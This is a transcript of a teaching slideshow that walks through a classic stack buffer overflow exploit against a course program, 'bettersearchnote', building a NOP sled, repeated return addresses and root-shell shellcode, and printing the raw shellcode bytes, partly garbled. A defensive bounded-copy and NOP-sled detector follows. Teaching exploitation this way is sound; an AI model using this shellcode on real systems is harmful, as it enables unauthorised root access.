Buffer Overflow Walk-Through
PowerPoint Slideshow about 'Buffer Overflow Walk-Through' - senwe


Presentation Transcript

The Code

Change the name of the notesearch program in our exploit code to match the course naming convention:

    strcpy(command, "./bettersearchnote.exe \'");


Normally, Jose runs the bettersearchnote program to search for notes with keywords of his choosing:

[email protected] $ ./bettersearchnote.exe "Life"

Life Sucks


The exploit program is crafted to run the program on his behalf, using the function system()

[email protected] $ ls

unix_basics booksrc work desktop ec310code

For example, system("ls") would list the contents of the current directory as though it had been run from the command line, like this, except that no one ever types it at the command prompt.


The exploit program is crafted to run the program on his behalf, using the function system()

[email protected] $ ./system_example.exe

unix_basics booksrc work desktop ec310code

system_example.c

    #include <stdlib.h>   /* declares system() */

    int main() {
        system("ls");    /* runs "ls" through the shell, as if typed at the prompt */
        return 0;
    }


Now, let's look at what the exploit program does…

Standard inclusion of C libraries


The goal of our exploit program is to open a root shell

This is machine language (the shell code) that opens a shell prompt for the user running the program


First, the set-up…

This is the standard way to start a program and take in command line arguments… but you already knew that.


Building the stack…

These lines declare the variables to be used in the program. The variables are placed on the stack for the main function.

(Stack diagram: buffer (address), command (address), offset (integer, 270), ret (integer), ptr (address), i (integer))


Allocating memory on the heap for our string command, which will be called by the function system()

Allocates 200 bytes on the heap for the string command. The address of this location on the heap becomes the value of the pointer command. This string will eventually be run with the function system().

(Diagram: a 200-byte block on the heap at address 0x__; on the stack, command now holds that address, written as &command; buffer, offset 270, ret, ptr and i are unchanged)


Allocating memory on the heap for our string command, which will be called by the function system()

The bzero function places 200 0x00's starting at the location to which command points.

(Diagram: the 200-byte heap block filled with 00 bytes; stack: buffer, command = &command, offset 270, ret, ptr, i)


Building the string command

This copies the string "./bettersearchnote.exe '" into the location pointed to by the pointer command.

(Diagram: the heap block now begins with the bytes ". / b e t t e r s e a r c h n o t e . e x e '" followed by 00 bytes; stack: buffer, command = &command, offset 270, ret, ptr, i)


Next, we need to find the address where the command line arguments for bettersearchnote will start!

This string will eventually overflow the bettersearchnote buffer, have the program execute our malicious code, and open a shell.

Take the number of bytes in the current string command, up to the null terminator (24 bytes), add this to the address held in the variable command, and store the resulting address in the pointer buffer.

(Diagram: the 24 bytes "./bettersearchnote.exe '" on the heap, with &command + 24 pointing just past them; stack: buffer = &command + 24, command = &command, offset 270, ret, ptr, i)


Specifying our custom return address

This takes the command line argument to create our own custom offset value, but it is not used.

(Diagram: heap block unchanged; stack: buffer = &command + 24, command = &command, offset 270, ret, ptr, i)


Specifying our custom return address

This takes the address of i and subtracts the value of offset. The result is placed in the variable ret; it represents the address of our desired shell code execution entry point.

(Diagram: heap block unchanged; stack: buffer = &command + 24, command = &command, offset 270, ret = &i - 270, ptr, i)


And place enough copies of our custom return address in the buffer to overwrite the original return address.

Takes the address contained in ret and places it at the address pointed to by buffer. This repeats every 4 bytes for 40 iterations.

(Diagram: the heap block now holds "./bettersearchnote.exe '" followed by repeated copies of &i - 270; stack: buffer = &command + 24, command = &command, offset 270, ret = &i - 270, ptr, i)


Now the entire heap looks like this

(Diagram: the heap block after the return-address loop)


Next, create a buffer of filler commands, called NOPs, to help find the shell code

memset() sets a byte in memory to the value specified. In this case it puts the value 0x90 at the address pointed to by buffer and into the next 59 addresses as well.

0x90 is machine code for "No Operation," which literally means do nothing.

(Diagram: the heap block holds "./bettersearchnote.exe '", then 60 bytes of 0x90, then the remaining copies of &i - 270; stack: buffer = &command + 24, command = &command, offset 270, ret = &i - 270, ptr, i)


Now the entire heap looks like this

(Diagram: the heap block with the NOP sled highlighted)


Then place our shell code into the buffer immediately following the NOPs

Copies the shell code into memory after the NOP sled.

(Diagram: the heap block holds "./bettersearchnote.exe '", the 0x90 NOP sled, the shell code, then the remaining copies of &i - 270; stack: buffer = &command + 24, command = &command, offset 270, ret = &i - 270, ptr, i)


Now the entire heap looks like this

(Diagram: the heap block with the newly inserted shell code highlighted)


Close the string command with a quote so it is ready to be run by the function system()

Concatenates a single quote at the end of the string command.


Now the string command is finished and ready for execution.

[email protected] $ ./bettersearchnote.exe ‘\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe2\x53\x89\xe2\x53\x89\xe1\xcd\x80\x80\x&i-270\x&i-270 \x&i-270\ x&i-270\ x&i-270\ x&i-270 \ x&i-270 \ x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 ’


exploit_notesearch

(Stack diagram of bettersearchnote.exe: searchstring, fd, printing, user id, sfp, return address)

100 characters are allotted to searchstring by bettersearchnote.exe.

exploit_notesearch's command buffer contains 184 bytes, so it writes 84 bytes beyond the end of searchstring's allotted space, ensuring that one of our custom return addresses replaces the original return address.
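As an added defensive example (not part of the slides or the exploit code they describe), the C below shows the bounded copy bettersearchnote would need in place of an unchecked strcpy into its 100-byte searchstring, plus a NOP-sled length check run over a constructed 184-byte argument; SEARCH_CAP, SAMPLE_LEN, bounded_copy, longest_nop_run and make_sample_arg are names assumed here.

```c
#include <stddef.h>
#include <string.h>

#define SEARCH_CAP 100   /* bytes allotted to searchstring (figure from the slides) */
#define SAMPLE_LEN 184   /* length of the argument the slides say the exploit passes */

/* The vulnerable pattern the slides describe, shown only for contrast:
 *     char searchstring[SEARCH_CAP];
 *     strcpy(searchstring, argv[1]);   // no length check: runs past sfp into the return address
 */

/* Hardened copy: accepts the argument only if it fits, terminator included.
 * Returns 0 on success, otherwise the number of bytes that would have spilled
 * past the buffer, so the caller can reject the input instead of using it. */
size_t bounded_copy(char *dst, size_t cap, const char *src)
{
    size_t need = strlen(src) + 1;   /* the NUL terminator needs room too */
    if (need > cap) {
        if (cap > 0) dst[0] = '\0';  /* leave a valid, empty string behind */
        return need - cap;
    }
    memcpy(dst, src, need);
    return 0;
}

/* Detection heuristic: longest run of 0x90 bytes in an argument. The sled the
 * slides build with memset() is 60 consecutive NOPs; no genuine search keyword
 * contains a run like that. */
size_t longest_nop_run(const char *s, size_t len)
{
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = ((unsigned char)s[i] == 0x90) ? run + 1 : 0;
        if (run > best) best = run;
    }
    return best;
}

/* Constructed sample argument: 60 NOP bytes followed by 'A' filler up to 184
 * bytes (no shell code or addresses; only the length and the sled matter here).
 * out must have room for SAMPLE_LEN + 1 bytes. */
size_t make_sample_arg(char *out)
{
    memset(out, 0x90, 60);
    memset(out + 60, 'A', SAMPLE_LEN - 60);
    out[SAMPLE_LEN] = '\0';
    return SAMPLE_LEN;
}
```

With the terminating NUL counted, the 184-byte argument overruns the 100-byte buffer by 85 bytes, one more than the slide's 84, because the slide does not count the terminator.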

